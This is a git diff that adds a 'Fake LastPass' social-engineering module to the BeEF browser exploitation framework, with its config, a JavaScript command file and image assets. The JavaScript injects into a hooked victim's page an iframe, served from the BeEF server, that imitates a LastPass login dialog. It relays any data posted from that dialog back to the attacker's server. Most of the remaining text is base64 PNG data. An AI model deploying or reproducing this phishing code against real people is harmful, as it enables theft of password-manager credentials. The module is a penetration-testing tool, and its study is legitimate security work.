 .../fake_lastpass/create_small.png            | Bin 0 -> 1709 bytes
 .../social_engineering/fake_lastpass/icon.png | Bin 0 -> 8315 bytes
 .../fake_lastpass/index.html                  | 188 ++++++++++++++++++
 .../fake_lastpass/indexFF.html                |  72 +++++++
 .../fake_lastpass/jquery-1.5.2.min.js         |  16 ++
 .../fake_lastpass/key_small.png               | Bin 0 -> 1592 bytes
 .../fake_lastpass/lpwhite_small.png           | Bin 0 -> 14271 bytes
 .../fake_lastpass/module.rb                   |  43 ++++
 .../fake_lastpass/q3Jrp.png                   | Bin 0 -> 521 bytes
 .../fake_lastpass/screenkeyboard.png          | Bin 0 -> 1181 bytes
 .../fake_lastpass/xsmall.png                  | Bin 0 -> 1501 bytes
 13 files changed, 373 insertions(+)
 create mode 100644 modules/social_engineering/fake_lastpass/command.js
 create mode 100644 modules/social_engineering/fake_lastpass/config.yaml
 create mode 100644 modules/social_engineering/fake_lastpass/create_small.png
 create mode 100644 modules/social_engineering/fake_lastpass/icon.png
 create mode 100644 modules/social_engineering/fake_lastpass/index.html
 create mode 100644 modules/social_engineering/fake_lastpass/indexFF.html
 create mode 100644 modules/social_engineering/fake_lastpass/jquery-1.5.2.min.js
 create mode 100644 modules/social_engineering/fake_lastpass/key_small.png
 create mode 100644 modules/social_engineering/fake_lastpass/lpwhite_small.png
 create mode 100644 modules/social_engineering/fake_lastpass/module.rb
 create mode 100644 modules/social_engineering/fake_lastpass/q3Jrp.png
 create mode 100644 modules/social_engineering/fake_lastpass/screenkeyboard.png
 create mode 100644 modules/social_engineering/fake_lastpass/xsmall.png

diff --git a/modules/social_engineering/fake_lastpass/command.js b/modules/social_engineering/fake_lastpass/command.js
new file mode 100644
index 000000000..ef4b7190d
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/command.js
@@ -0,0 +1,39 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// Prepare the onmessage event handling
+	var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
+	var eventer = window[eventMethod];
+	var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";
+	eventer(messageEvent,function(e) {
+		if (e.data == "KILLFRAME") {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Killing Frame');	
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'meta=KILLFRAME');	
+			beef.dom.removeElement('LPIFRAME');
+			return;
+		} else {
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=' + e.data);	
+		}
+	},false);	
+
+	if (beef.browser.isC()) {
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
+	} else {
+		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
+		beef.dom.createIframe('custom','get',{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'280px','height':'345px','position':'fixed','left':(($j(window).width()/2)-140)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
+	}
+
+	// $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>");
+
+	// $j('#lp_login_dia').load(beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+"/lp/index.html");
+
+
+
+});
diff --git a/modules/social_engineering/fake_lastpass/config.yaml b/modules/social_engineering/fake_lastpass/config.yaml
new file mode 100644
index 000000000..c39c851ef
--- /dev/null
+++ b/modules/social_engineering/fake_lastpass/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_lastpass:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake LastPass"
+            description: "Displays a fake LastPass user dialog."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_lastpass/create_small.png b/modules/social_engineering/fake_lastpass/create_small.png
new file mode 100644
index 0000000000000000000000000000000000000000..8e9f1b014c8ac5be47041afed3b191faa6924589
GIT binary patch
literal 1709
zcmaJ?Yfuwc7!5=LgH)-sQ4w5&O3Nd=351X>DZ~T>C5S*JQidjEHxMz|b+bZ1TOnvE
zU<FhJ#!^A6pdyqJ1*9NBS{_!Zuc@LGu%q~>AR@lC-5_9pl<v&#z4x1Q&iA~tnV})e
zZ5Z<zG#bq&C{Pkct$^vZvY@`Yl$6KRGLQ6^k>Qw%Oi~aiO@v^vC=jGk#GzrR0!iM`
zf%?#B^u_8387Y$n!%9rUR+unsy#}Y)G@6gE9#<$6P!fnm<J4LqYpCHg3s56MRwPdf
zNpUe6uMSKh(D0Oy2xUrwQh>00KLvdBFeRWtNd=(Stk>#by^uAg3sZZO8Ds%t5Hdl?
zdK;8X8VZOp0tI+%$Xy9}aR4t*HpdeZcnaJAF2sRA4i|*@?i>i_@nMJqj6W>O8-b|c
zFiF6;FX|*@#gilsgJ4op5<AI*jS+DmM<5V@5EtZf-6@2-E?G+|^zK@n(}aQq)hP)z
zPO332U{X}XVjD>zi;DDZ3L1P;R;wE?6IC!!ufRbL8#1Ld0hCJrAF9zzqIF~#`Yzu8
z6xKx~<0u%0>adN3l4_jF$>a)$#RRG#F(LxP)=yM1G#(={T|9;Z;&2|D14tE0wbo=A
zV@RcNkXA=3v`REcB4kk-Y_%GJ`Fu~VzevCpc?1YJ9Dhi_6?+NzkQY^TF>jf-{{&Zp
zDK~0REjhtO-f=yq<eG*-gHxU*D4|Y7kpKeI0AoqR>ZxOarqmnfB2&l0nUV`q!GNaL
z{;Sm!CTf06+sVPD4wIvgYN>fAsKK6RFSDcW%fcXuC_>*|6DeKC64_O9Y*u`8H9OVb
zUph@>%ycc_I2WFu5wHsCn6Xr6$eq(FFe3ebAPeV48mvnf0g~vs``>4_{8UxGv*2XI
ziA~*>UD~seqm6&3%r6cZ2(}u|@CFT+=)(@f2ik^eTO;rFENxmmxWSCxmywb2oTzuZ
zc=z%7_NuBXz3kH6%ln_UynNa4V0OK;R&{)B-q~BNZEefHs*g_0IMe@gY_-hQHvN{!
zC@4B~%_V<DqK{)Qt!rRpf7G$82$v;ANbt_rD=ql-mgecM_eJhEPin3kDz4MI5N`CE
zi$-G_kUmr$$1SQ+irf?FW$9kcuKA1`mC7&D-F!2U!JM2NEY{Z0OW*;#M<G?cL$z|w
zQ}2#9+x@5QD2!Ruzo0LSW6s>IH#~{HFKnMtymfWznPP5#v{ioUZzVSxKoBH`A3U(h
zIc)oZzA>ivs&%B&_w{@AxAi_>U-vCm|7HE1Yw5nSva*D;nN=6sw>va%**1M(YnHr^
zdGyMW47|>zWZE{D;=LE*?F7%{P;TbDk?xXv%!5uP&7U^cer9wyWgmSSe5hgguo9Am
z%WVda&{j4%_TVoX(>Apo?0Cg|_JT_scU-t$>{Jw-^?Wn?+K{=m`5@EatP<XFwF}KU
z;qX1fX0WXJfH=*fr$4HC^k7TA6}`#UJQ0Yb32$6>Y=-lfzz4L|rN&0W@0WefKt&rM
zdMrN1FZanSWaS0kY3jGo9vSsxc>lSjvZBBPSh8;$vm$NnrBkHY(9WB@s9Cqo;$9V*
z7n&JQKDxXsr8_>#6Nimm@fLQ4mWGdj1q|R#xTSnnYVO{1sz)8FmQ{T&$@GuqaMKpi
ztNs9*`bprAetj{F&1H1QXDuTm$A^$g_?BSMx;y*A=XQ+gzsFQ(n}67u{RXf3^2u7p
z?B=+KxgnjqcFoy9k~JeG33cCw?ndfHn^vEBey+3J=!bIGh05&r%&ZdZQ1P?<+<v8>
z+U_Z@mf5Y&D|H5hOFtR#ZuOX1eYmp#XI`zy4_M}%%_~3VSog#HJzKi294c>L6Zeww
bdXAiy;Jgl7*>kkk^aBa<50O+ZlN<g4Zr7Sq

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_lastpass/icon.png b/modules/social_engineering/fake_lastpass/icon.png
new file mode 100644
index 0000000000000000000000000000000000000000..3d12673955f9585e4f43dd2dfcfbd85016380a2f
GIT binary patch
literal 8315
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
